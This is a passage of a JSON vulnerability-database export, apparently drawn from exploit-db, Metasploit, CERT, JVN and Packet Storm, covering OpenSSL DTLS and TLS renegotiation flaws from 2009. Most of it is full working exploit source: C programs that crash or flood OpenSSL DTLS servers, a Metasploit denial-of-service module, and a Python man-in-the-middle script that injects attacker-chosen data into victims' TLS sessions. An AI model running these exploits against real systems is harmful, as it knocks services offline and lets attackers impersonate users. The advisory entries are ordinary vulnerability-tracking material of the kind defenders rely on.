(%s)\\n\", err, strerror(errno));\n\t\texit(1);\n\t}\n\n\tmemcpy(buf, \"\\x14\\xfe\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\", 14);\n\n\tprintf(\"[+] Sending DTLS datagram of death at %s:%s...\\n\", argv[1], argv[2]);\n\n\tsend(sock, buf, 14, 0);\n\n\tclose(sock);\n\n\treturn 0;\n}\n\n// milw0rm.com [2009-06-04]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8873/"}, {"lastseen": "2016-02-01T08:00:28", "osvdbidlist": ["54614"], "references": [], "edition": 1, "description": "OpenSSL <= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS. CVE-2009-1379. Dos exploits for multiple platform", "reporter": "Jon Oberheide", "published": "2009-05-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1379"], "modified": "2009-05-18T00:00:00", "id": "EDB-ID:8720", "href": "https://www.exploit-db.com/exploits/8720/", "sourceData": "/*\n * cve-2009-1378.c\n *\n * OpenSSL <= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS\n * Jon Oberheide <jon@oberheide.org>\n * http://jon.oberheide.org\n *\n * Information:\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378\n *\n * In dtls1_process_out_of_seq_message() the check if the current message is \n * already buffered was missing. For every new message was memory allocated, \n * allowing an attacker to perform an denial of service attack with sending \n * out of seq handshake messages until there is no memory left.\n *\n * Usage:\n *\n * Pass the host and port of the target DTLS server:\n *\n * $ gcc cve-2009-1378.c -o cve-2009-1378\n * $ ./cve-2009-1378 1.2.3.4 666\n *\n * Notes:\n *\n * With a MTU of 1500, the attack leaks 1503 bytes of memory with each UDP\n * datagram. If you have a bigger MTU than 1500, feel free to set it.\n *\n * Complete memory exhaustion may take a while depending on the throughput \n * to the target and the amount of memory it has. By default, we'll just \n * continue sending datagrams indefinitely.\n *\n */\n\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <errno.h>\n#include <netdb.h>\n#include <netinet/in.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <sys/socket.h>\n\n#define MTU 1500\n\n#define IP_HDR_LEN 20\n#define UDP_HDR_LEN 8\n#define MAX_LEN (MTU - IP_HDR_LEN - UDP_HDR_LEN)\n\n#define put16(b, data) ( \\\n (*(b) = ((data) >> 8) & 0xff), \\\n (*((b)+1) = (data) & 0xff))\n\nint\nmain(int argc, char **argv)\n{\n\tint sock, ret;\n\tchar *ptr, *err;\n\tstruct hostent *h;\n\tstruct sockaddr_in target;\n\tchar buf[MAX_LEN];\n\n\tif (argc < 3) {\n\t\terr = \"Pass the host and port of the target DTLS server\";\n\t\tprintf(\"[-] Error: %s\\n\", err);\n\t\texit(1);\n\t}\n\n\th = gethostbyname(argv[1]);\n\tif (!h) {\n\t\terr = \"Unknown host specified\";\n\t\tprintf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\n\t\texit(1);\n\t}\n\n\ttarget.sin_family = h->h_addrtype;\n\tmemcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length);\n\ttarget.sin_port = htons(atoi(argv[2]));\n\n\tsock = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sock == -1) {\n\t\terr = \"Failed creating UDP socket\";\n\t\tprintf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\n\t\texit(1);\n\t}\n\n\tret = connect(sock, (struct sockaddr *) &target, sizeof(target));\n\tif (ret == -1) {\n\t\terr = \"Failed to connect socket\";\n\t\tprintf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\n\t\texit(1);\n\t}\n\n\tptr = buf;\n\n\t/* header */\n\tmemcpy(ptr, \"\\x16\\xfe\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", 11);\n\tptr += 11;\n\n\t/* packet length */\n\tput16(ptr, MAX_LEN - ((ptr - buf) + 2));\n\tptr += 2;\n\t\n\t/* client hello */\n\tmemcpy(ptr, \"\\x01\", 1);\n\tptr += 1;\n\t\n\t/* length */\n\tmemcpy(ptr, \"\\x00\", 1);\n\tptr += 1;\n\tput16(ptr, MAX_LEN - ((ptr - buf) + 2 + 8));\n\tptr += 2;\n\n\t/* sequence number */\n\tmemcpy(ptr, \"\\x00\\x01\", 2);\n\tptr += 2;\n\n\t/* frag offset */\n\tmemcpy(ptr, \"\\x00\\x00\\x00\", 3);\n\tptr += 3;\n\n\t/* length */\n\tmemcpy(ptr, \"\\x00\", 1);\n\tptr += 1;\n\tput16(ptr, MAX_LEN - ((ptr - buf) + 2));\n\tptr += 2;\n\n\t/* payload */\n\tmemset(ptr, '\\x00', MAX_LEN - (ptr - buf));\n\n\tprintf(\"[+] Firing loads of packets at %s:%s...\\n\", argv[1], argv[2]);\n\n\twhile (1) {\n\t\tsend(sock, buf, MAX_LEN, 0);\n\t}\n\n\tclose(sock);\n\n\treturn 0;\n}\n\n// milw0rm.com [2009-05-18]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8720/"}], "metasploit": [{"lastseen": "2018-09-08T03:49:31", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module performs a Denial of Service Attack against Datagram TLS in OpenSSL version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a ChangeCipherspec Datagram before a ClientHello.", "reporter": "Rapid7", "published": "2011-05-04T19:08:28", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb", "type": "metasploit", "title": "OpenSSL DTLS ChangeCipherSpec Remote DoS", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1386"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-08-25T01:38:44", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/DOS/SSL/DTLS_CHANGECIPHERSPEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Dos\n include Msf::Exploit::Capture\n include Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'OpenSSL DTLS ChangeCipherSpec Remote DoS',\n 'Description'\t=> %q{\n This module performs a Denial of Service Attack against Datagram TLS in OpenSSL\n version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a\n ChangeCipherspec Datagram before a ClientHello.\n },\n 'Author'\t=> [\n 'Jon Oberheide <jon[at]oberheide.org>', #original code\n 'theLightCosine' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-1386' ],\n [ 'OSVDB', '55073'],\n ],\n 'DisclosureDate' => 'Apr 26 2000'))\n\n deregister_options('FILTER','PCAPFILE', 'INTERFACE', 'SNAPLEN', 'TIMEOUT')\n end\n\n def run\n open_pcap\n print_status(\"Creating DTLS ChangeCipherSpec Datagram...\")\n p = PacketFu::UDPPacket.new\n p.ip_daddr = datastore['RHOST']\n p.ip_src = rand(0x100000000)\n p.ip_ttl = 44\n p.udp_sport = 34060\n p.udp_dport = datastore['RPORT'].to_i\n p.payload = \"\\x14\\xfe\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\"\n p.recalc\n print_status(\"Sending Datagram to target...\")\n capture_sendto(p, '255.255.255.255')\n close_pcap\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb"}], "cert": [{"lastseen": "2018-08-31T02:37:15", "references": ["http://www.ietf.org/mail-archive/web/tls/current/msg03948.html", "http://www.educatedguesswork.org/2009/11/understanding_the_tls_renegoti.html", "http://www.links.org/?p=786", "https://bugzilla.redhat.com/show_bug.cgi?id=533125", "http://lists.gnu.org/archive/html/gnutls-devel/2009-11/msg00014.html", "http://cvs.openssl.org/chngview?cn=18790", "http://extendedsubset.com/?p=8", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3555", "http://blogs.iss.net/archive/sslmitmiscsrf.html", "http://www.links.org/?p=789", "http://www.links.org/?p=780", "http://blog.zoller.lu/2009/11/new-sslv3-tls-vulnerability-mitm.html", "http://www.links.org/files/no-renegotiation-2.patch", "https://svn.resiprocate.org/rep/ietf-drafts/ekr/draft-rescorla-tls-renegotiate.txt", "https://svn.resiprocate.org/rep/ietf-drafts/ekr/draft-rescorla-tls-renegotiate.txt"], "description": "### Overview\n\nA vulnerability exists in SSL and TLS protocols that may allow attackers to execute an arbitrary HTTP transaction.\n\n### Description\n\nThe Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols are commonly used to provide authentication, encryption, integrity, and non-repudiation services to network applications such as HTTP, IMAP, POP3, LDAP. A vulnerability in the way SSL and TLS protocols allow renegotiation requests may allow an attacker to inject plaintext into an application protocol stream. This could result in a situation where the attacker may be able to issue commands to the server that appear to be coming from a legitimate source. According to the [Network Working Group](<https://svn.resiprocate.org/rep/ietf-drafts/ekr/draft-rescorla-tls-renegotiate.txt>): \n\n_The server treats the client's initial TLS handshake as a renegotiation and thus believes that the initial data transmitted by the attacker is from the same entity as the subsequent client data._ \n \nThis issue affects SSL version 3.0 and newer and TLS version 1.0 and newer. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker may be able to inject an arbitrary amount of chosen plaintext into the beginning of the application protocol stream. This could allow and attacker to issue HTTP requests, or take action impersonating the user, among other consequences. \n \n--- \n \n### Solution\n\nUsers should contact vendors for specific patch information. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nBarracuda Networks| | 05 Nov 2009| 17 Dec 2009 \nDebian GNU/Linux| | 05 Nov 2009| 11 Nov 2009 \nGnuTLS| | 05 Nov 2009| 11 Nov 2009 \nHewlett-Packard Company| | 05 Nov 2009| 17 Dec 2009 \nIBM Corporation| | 05 Nov 2009| 11 Nov 2009 \nMcAfee| | 05 Nov 2009| 11 Nov 2009 \nSun Microsystems, Inc.| | 05 Nov 2009| 06 Nov 2009 \nCryptlib| | 05 Nov 2009| 11 Nov 2009 \nForce10 Networks, Inc.| | 05 Nov 2009| 22 Jul 2011 \nlibgcrypt| | 05 Nov 2009| 11 Nov 2009 \nRedback Networks, Inc.| | 05 Nov 2009| 11 Nov 2009 \nSafeNet| | 05 Nov 2009| 19 Nov 2009 \n3com Inc| | 05 Nov 2009| 05 Nov 2009 \nACCESS| | 05 Nov 2009| 05 Nov 2009 \nAlcatel-Lucent| | 05 Nov 2009| 05 Nov 2009 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23120541 Vendor Status Inquiry>). \n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://extendedsubset.com/?p=8>\n * <http://www.links.org/?p=780>\n * <http://www.links.org/?p=786>\n * <http://www.links.org/?p=789>\n * <http://blogs.iss.net/archive/sslmitmiscsrf.html>\n * <http://www.ietf.org/mail-archive/web/tls/current/msg03948.html>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=533125>\n * <http://lists.gnu.org/archive/html/gnutls-devel/2009-11/msg00014.html>\n * <http://cvs.openssl.org/chngview?cn=18790>\n * <http://www.links.org/files/no-renegotiation-2.patch>\n * <http://blog.zoller.lu/2009/11/new-sslv3-tls-vulnerability-mitm.html>\n * <https://svn.resiprocate.org/rep/ietf-drafts/ekr/draft-rescorla-tls-renegotiate.txt>\n * <http://www.educatedguesswork.org/2009/11/understanding_the_tls_renegoti.html>\n\n### Credit\n\nThanks to Marsh Ray of PhoneFactor for reporting this vulnerability. This issue was also independently discovered and publicly disclosed by Martin Rex of SAP.\n\nThis document was written by Chris Taschner.\n\n### Other Information\n\n * CVE IDs: [CVE-2009-3555](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3555>)\n * Date Public: 05 Nov 2009\n * Date First Published: 11 Nov 2009\n * Date Last Updated: 22 Jul 2011\n * Document Revision: 35\n\n", "edition": 3, "reporter": "CERT", "published": "2009-11-11T00:00:00", "title": "SSL and TLS protocols renegotiation vulnerability", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2009-3555", "CVE-2009-3555"], "modified": "2011-07-22T00:00:00", "id": "VU:120541", "href": "https://www.kb.cert.org/vuls/id/120541", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "jvn": [{"lastseen": "2018-08-31T00:36:30", "references": [], "description": "\n ## Description\n\nPHP is an open source scripting language that is especially suited for Web development. PHP contains a cross-site scripting vulnerability as it does not properly handle errors. \n\n ## Impact\n\nAn arbitrary script may be executed on the user's web browser. \n\n ## Solution\n\n**Update the Software** \nApply [the latest update](<http://www.php.net/downloads.php>) provided by the developer. \n \nAccording to the developer, PHP 4.X is no longer supported. Users of PHP 4.X are recommended to upgrade to PHP 5.2.X. \n\n ## Products Affected\n\n * PHP 5.2.7 and earlier\nIf PHP is configured with display_errors=off in php.ini, it is not affected. \nAdditionally, PHP 5.3.0alpha is not affected. \n\n", "edition": 3, "reporter": "Japan Vulnerability Notes", "published": "2008-12-19T00:00:00", "title": "JVN#50327700 PHP vulnerable to cross-site scripting", "type": "jvn", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "info", "cvelist": ["CVE-2008-5814"], "modified": "2008-12-19T00:00:00", "id": "JVN:50327700", "href": "http://jvn.jp/en/jp/JVN50327700/index.html", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:34", "references": [], "edition": 1, "description": "", "reporter": "redteam-pentesting.de", "published": "2009-12-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "TLS Renegotiation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2009-12-21T00:00:00", "href": "https://packetstormsecurity.com/files/84112/TLS-Renegotiation-Exploit.html", "id": "PACKETSTORM:84112", "sourceData": "`#!/usr/bin/env python \n \n###################################### \n# # \n# RedTeam Pentesting GmbH # \n# kontakt@redteam-pentesting.de # \n# http://www.redteam-pentesting.de # \n# # \n###################################### \n \n# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555) \n \n# License \n# ------- \n# CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/ \n \n# Timeline \n# -------- \n# 2009-12-21 initial public release \n \n# Known Issues \n# ------------ \n# Firefox: if it fails connecting to a TLS site too often, falls back to \n# issuing SSLv2 ClientHello only until browser is restarted \n# \n# wget: attempts SSLv2 ClientHello by default \n \n# References \n# ---------- \n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555 \n# http://www.phonefactor.com/sslgap \n# http://www.extendedsubset.com/ \n# http://www.g-sec.lu/practicaltls.pdf \n# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01 \n \nimport tlslite \nimport tlslite.api \nimport tlslite.messages \nimport tlslite.constants \nimport struct \nimport socket \nimport threading \nimport array \nimport sys \nimport optparse \n \n \nif not hasattr(threading.Thread, 'name'): \n# emulate python 2.6 threading module for earlier versions \nthreading.current_thread = threading.currentThread \nsetattr(threading.Thread, 'name', \nproperty(threading.Thread.getName, threading.Thread.setName)) \n \ndef forward(sock1, sock2): \nsock1.settimeout(1.0) \nwhile True: \ntry: \ndata = sock1.recv(4096) \nif not data: \nreturn \nsock2.send(data) \nexcept socket.error, ex_error: \nif ex_error[0] == 104: # Connection reset by peer \nreturn \nexcept socket.timeout, ex_timeout: \npass \n \n \nclass MessageWrapper(object): \ndef __init__(self, version = (3, 1), ssl2 = False): \nself.contentType = tlslite.messages.ContentType.handshake \nself.ssl2 = ssl2 \nself.client_version = version \n \ndef setType(self, type): \nself.contentType = type \n \ndef addBytes(self, bytes): \nself.bytes = bytes \n \ndef write(self, trial=False): \nif trial: \nraise Exception('Unsupported') \nreturn array.array('B', self.bytes) \n \ndef send_record(sock, msg_type, version_major, version_minor, record): \nmsg = struct.pack('!BBBH', msg_type, version_major, version_minor, len(record)) \nif type(record) != str: \nmsg += record.tostring() \nelse: \nmsg += record \nsock.send(msg) \n \ndef send_encapsulated(sslsock, type, messagebytes, version = (3, 1)): \nmsg = MessageWrapper(version) \nmsg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes)) \nmsg.setType(type) \nfor dummy in sslsock._sendMsg(msg, True): \npass \n \ndef decrypt_record(sslsock, type, recordbytes): \nfor result in sslsock._decryptRecord(type, array.array('B', recordbytes)): \npass \nreturn result \n \ndef recv_record(sock): \ntry: \nheader = sock.recv(5) \nif not header: \nreturn None, None, None, None \nmsg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header) \nrecord = '' \nwhile len(record) != msg_length: \nrecord += sock.recv(msg_length - len(record)) \nreturn msg_type, msg_version_major, msg_version_minor, record \nexcept socket.error, ex: \nif ex[0] == 104: # Connection reset by peer \nreturn \n \ndef recv_clienthello(sock): \nheader_bytes = [] \nheader_bytes.append(sock.recv(1)) \nheader_bytes[0] = struct.unpack('!B', header_bytes[0])[0] \nif header_bytes[0] & 0x80: \n# Version 2.0 Client \"Record Layer\" \nheader_bytes.append(sock.recv(1)) \nheader_bytes[1] = struct.unpack('!B', header_bytes[1])[0] \nmsg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1] \nmsg_version_major = 2 \nmsg_version_minor = 0 \nmsg_type = tlslite.constants.ContentType.handshake \nrecord = sock.recv(msg_length) \nelse: \nheader = sock.recv(4) \nmsg_type = header_bytes[0] \nmsg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header) \nrecord = sock.recv(msg_length) \n \nreturn msg_type, msg_version_major, msg_version_minor, record \n \ndef send_hello_request(sock): \nsock.send(\"\\x16\" # Record Layer: Handshake Message \n+\"\\x03\\x01\" # Record Layer Version: TLS 1.0 \n+\"\\x00\\x04\" # Record Layer Length: 4 \n+\"\\x00\" # Handshake Message Type: Hello Request \n+\"\\x00\\x00\\x00\") # Handshake Message Length: 0 \n \ndef send_protocol_version_alert(sock): \nsock.send(\"\\x15\" # Record Layer: Alert\" \n+\"\\x03\\x01\" # Record Layer Version: TLS 1.0 \n+\"\\x00\\x02\" # Record Layer Length: 2 \n+\"\\x00\" # Alert Message: fatal \n+\"\\x46\") # Alert Message: protocol version \n \n \ndef handle_victim(victim, options, mitmcount): \n \nif options.one_shot and mitmcount != 0: \nprint threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only' \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nsock.connect(options.target) \nprint threading.current_thread().name, 'Connected to target %s:%u' % options.target \nexcept socket.error, ex: \nprint threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target \nprint threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \nt1 = threading.Thread(target=forward, args=(sock, victim)) \nt1.start() \n \nt2 = threading.Thread(target=forward, args=(victim, sock)) \nt2.start() \n \nt1.join() \nsock.close() \n \nt2.join() \nvictim.close() \nreturn \n \n# obtain initial \"client hello\" message \nmsg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim) \nif msg_version_major == 2: \nprint threading.current_thread().name, \"client sent SSLv2 client hello message, exiting thread\" \nreturn \n \ntls_version = (msg_version_major, msg_version_minor) \ntype, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39]) \nresume_session = (session_id_length != 0) \nif resume_session: \nprint threading.current_thread().name, \"client attempting to resume session\" \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nsock.connect(options.target) \nprint threading.current_thread().name, 'Connected to target %s:%u' % options.target \nexcept socket.error, ex: \nprint threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target \nprint threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \n \nsslsock = tlslite.api.TLSConnection(sock) \nhandshake_settings = tlslite.HandshakeSettings.HandshakeSettings() \nhandshake_settings.minVersion = tls_version \nhandshake_settings.maxVersion = tls_version \nsslsock.handshakeClientCert(settings = handshake_settings) \n \n# inject prefix \nsslsock.write(options.inject) \nprint threading.current_thread().name, 'Injected %s' % repr(options.inject) \n \n# send original \"client hello\" message over the encrypted channel \nsend_encapsulated(sslsock, 22, hello_msg, tls_version) \n \n# now receive serveral TLS messages from the server, decrypt them, and forward \n# them to the client, until the server sends \"server hello done\" \n# these messages include \"server hello\", \"certificate\", \"server key exchange\", \n# unless the client is trying to resume a previous session \nprint threading.current_thread().name, \"about to receive server handshake messages\" \nserver_handshake_done = False \nwhile not server_handshake_done: \nmsg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock) \nif result: \nresult = decrypt_record(sslsock, msg_type, result) \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, result) \nif result[0] == 0x0e: # server hello done - should terminate handshake \nserver_handshake_done = True \nelif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant \nserver_handshake_done = True \nelse: \nprint threading.current_thread().name, 'receive from server failed, exiting thread' \nreturn \nprint threading.current_thread().name, \"server handshake done\" \n \n \n# now its the the client's turn to send some messages, e.g. \n# \"client key exchange\" and \"change cipher spec\" \nprint threading.current_thread().name, \"about to receive client handshake messages\" \nhandshake_finished = False \nwhile not handshake_finished: \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(victim) \nprint threading.current_thread().name, msg_type \nsend_encapsulated(sslsock, msg_type, record, tls_version) \nif msg_type == 0x14: # change cipher spec \nhandshake_finished = True \n \nprint threading.current_thread().name, \"client handshake done\" \n \n# message after \"change cipher spec\" must be sent in the \"clear\" \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(victim) \nsend_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record) \n \n# server should now send \"change cipher spec\" message, we decrypt and send that to the victim \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock) \nresult = decrypt_record(sslsock, msg_type, record) \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, result) \n \n# finalize handshake \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock) \nif record: \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, record) \nelse: \nsslsock.sock.close() \nvictim.close() \ndel sslsock \nreturn \n \n \n \n# the rest is just forwarding TLS records between both parties, \n# which we cannot interfere with anymore, apart from dropping server \n# responses \nif options.drop: \nsslsock.sock.close() \ndel sslsock \nelse: \nt1 = threading.Thread(target=forward, args=(sslsock.sock, victim)) \nt1.start() \n \nt2 = threading.Thread(target=forward, args=(victim, sslsock.sock)) \nt2.start() \n \nif not options.drop: \nt1.join() \nsslsock.sock.close() \n \nt2.join() \nvictim.close() \n \n \n \nif __name__ == \"__main__\": \nparser = optparse.OptionParser() \nparser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443) \nparser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0') \nparser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' ) \nparser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA') \nparser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE') \nparser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA') \nparser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections') \nparser.add_option('-d', '--drop-responses', dest='drop', action=\"store_true\", default=False, help='drop server responses after renegotiating') \n \n(options, args) = parser.parse_args() \n \nif len([i for i in (options.inject, options.inject_file, options.inject_base64) if i]) != 1: \nprint 'Exactly one injection option must be specified' \nsys.exit(1) \n \nif options.inject_file: \ntry: \noptions.inject = open(options.inject_file, 'r').read() \nexcept IOError, ex: \nprint ex \nsys.exit(1) \n \nif options.inject_base64: \nimport base64 \ntry: \noptions.inject = base64.decodestring(options.inject_base64) \nexcept base64.binascii.Error, ex: \nprint 'Error decoding base64 data: %s' % ex \nsys.exit(1) \n \n \nif not options.listen_port or \\ \nnot options.bind_address or \\ \nnot options.target or \\ \nnot options.inject: \nparser.print_help() \nsys.exit(1) \n \ntarget = options.target.split(':') \nif len(target)==2: \ntry: \ntarget[1] = int(target[1]) \nexcept ValueError: \ntarget[1] = None \nif len(target)!=2 or not target[0] or not target[1]: \nprint 'Target \\'%s\\' not in format HOST:PORT' % options.target \nsys.exit(1) \n \noptions.target = tuple(target) \n \ntry: \nlistensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nlistensocket.bind((options.bind_address, options.listen_port)) \nprint 'Listening on %s:%u' % (options.bind_address, options.listen_port) \nexcept socket.error, ex: \nprint 'Couldn\\'t listen on %s:%u' % (options.bind_address, options.listen_port) \nprint 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \nlistensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \nlistensocket.listen(5) \n \nmitmcount = 0 \n \nwhile True: \ntry: \nvictim, victimaddr = listensocket.accept() \nprint 'New connection from %s:%u' % victimaddr \n \nthreading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start() \nmitmcount += 1 \n \nexcept KeyboardInterrupt, ex: \nprint '\\nAborted by user, exiting...' \nlistensocket.close() \nsys.exit(1) \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/84112/tls-reneg.py.txt", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}]}